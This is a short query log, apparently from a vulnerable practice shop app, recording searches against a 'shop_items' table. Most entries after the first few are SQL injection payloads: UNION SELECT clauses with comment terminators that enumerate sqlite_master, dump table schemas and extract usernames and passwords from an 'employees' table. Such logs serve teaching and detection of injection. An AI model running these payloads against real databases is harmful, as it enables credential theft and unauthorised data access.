SELECT * FROM shop_items WHERE name LIKE 'water' 
SELECT * FROM shop_items WHERE name LIKE 'Lemon' 
SELECT * FROM shop_items WHERE name LIKE 'water' 
SELECT * FROM shop_items WHERE name LIKE '%' 
SELECT * FROM shop_items WHERE name LIKE 'juice' UNION SELECT 1,2,3 from sqlite_master WHERE type="table"; --' 
SELECT * FROM shop_items WHERE name LIKE 'water' 
SELECT * FROM shop_items WHERE name LIKE 'juice' UNION SELECT name,sql,3 from sqlite_master WHERE type="table"; --' 
SELECT * FROM shop_items WHERE name LIKE 'juice' UNION SELECT username,password,3 from employees;--' 
SELECT * FROM shop_items WHERE name LIKE 'juice' UNION SELECT 1,2,3 from sqlite_master WHERE type="table"; --' 
SELECT * FROM shop_items WHERE name LIKE 'water' 
SELECT * FROM shop_items WHERE name LIKE '%';--' 
